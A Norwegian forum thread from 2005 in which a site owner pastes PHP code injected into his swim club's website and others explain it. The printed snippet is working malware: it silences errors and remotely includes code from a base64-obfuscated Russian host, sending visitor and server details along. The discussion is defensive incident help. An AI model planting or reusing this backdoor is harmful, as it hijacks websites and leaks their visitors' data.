Kan noen fortelle meg hva denne koden er?

[Christian_]

Det er noen som har kødda med websiden min og lagt denne koden inn i nesten alle php-filene mine, hva betyr egentlig dene koden?

 

error_reporting(0);

$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);

$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); 

$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); 

$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); 

$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); 

$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); 

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);

if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} 

else 
{include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

 

Takker for alle svar, vil gjerne ha rettet opp dette fortest mulig

 

mvh

Christian

[hero_ruler]

De inkluderer siden : http://user7.phpinclude.ru/ på hjemmesiden din.

[Christian_]

Ikke bra.

 

Mye jobb å få fjerna alt sammen

[saivert]

De inkluderer siden : http://user7.phpinclude.ru/ på hjemmesiden din.

5282085[/snapback]

 

Det er en underdrivelse. Den koden gjør også at en del informasjon om serveren din samt klientinfo blir sendt til den phpinclude.ru siden.

 

Pass deg for forms som ikke er sikret mot missbruk. Tror du må tette noen sikkerhetshull.

 

Jeg kan godt ta en titt hvis du har kildekoden klar.

Endret 12. desember 2005 av saivert

[Christian_]

Det ikke på min personlige side (Tenker på gjestebokinlegget ditt nå saivert), men en side jeg driver for den lokale svømmeklubben. Siden er satt opp av aj-fork + at jeg bruker raabok som gjestebok. Disse kodene har bligg lagt inn på en slik måte at de ikke kan ha blitt lagt inn gjennom et script. Dette må sansynligvis ha skjedd manuelt. Har skifta passord på ftp-en nå for å være helt sikker på at det ikke skjer igjen.